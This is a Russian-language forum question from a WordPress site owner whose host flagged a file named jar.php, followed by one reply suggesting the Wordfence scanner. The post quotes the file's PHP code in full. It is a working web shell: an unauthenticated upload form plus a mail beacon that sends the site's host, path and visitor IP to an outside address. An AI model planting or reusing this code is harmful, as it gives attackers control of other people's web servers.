Получил письмо от hostgator, в котором говорилось, что "в вашей учетной записи размещены вредоносные файлы". Не знаю почему? - PullRequest
0 голосов
/ 08 мая 2019

Вчера я получил письмо от hostgator, в котором говорилось, что вы разместили вредоносный файл, и имя файла jar.php, оно находится в wp-admin / images / jar.php по этому пути

Я не знаю, что это из-закакой-нибудь плагин или CMS

Jar.php file contain below code

<html>
<title>Up</title>
<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' value='upload' name='upload'>
</form>
<?php if(isset($_POST['upload'])) { if(@copy($_FILES['idx_file'] 
 ['tmp_name'], $_FILES['idx_file']['name'])) { echo$_FILES['idx_file'] 
 ['name']. '[<b>OK</b>]'; } else { echo$_FILES['idx_file']['name']. 
'[<b>FAILED</b>'; } }
?>
<?php
$ip = getenv("REMOTE_ADDR");
$subj98 = " Tuy |$ip";
$email = "asku@yax.com";
$from = "From: Result<Tuyul";
$a45 = $_SERVER['REQUEST_URI'];
$b75 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$m22 $b75 $a45";
mail($email, $subj98, $msg8873, $from);
?>

Я не понимаю, что в этом плохого, Любая помощь будет принята с благодарностью.

Заранее спасибо

1 Ответ

0 голосов
/ 08 мая 2019

Это может быть хакерская атака на ваш сайт.

  Install this https://wordpress.org/plugins/wordfence/ 

плагин и сканирование вашего источника. Это бесплатный плагин, который покажет вам список файлов, на которые распространяется вирусный код.

...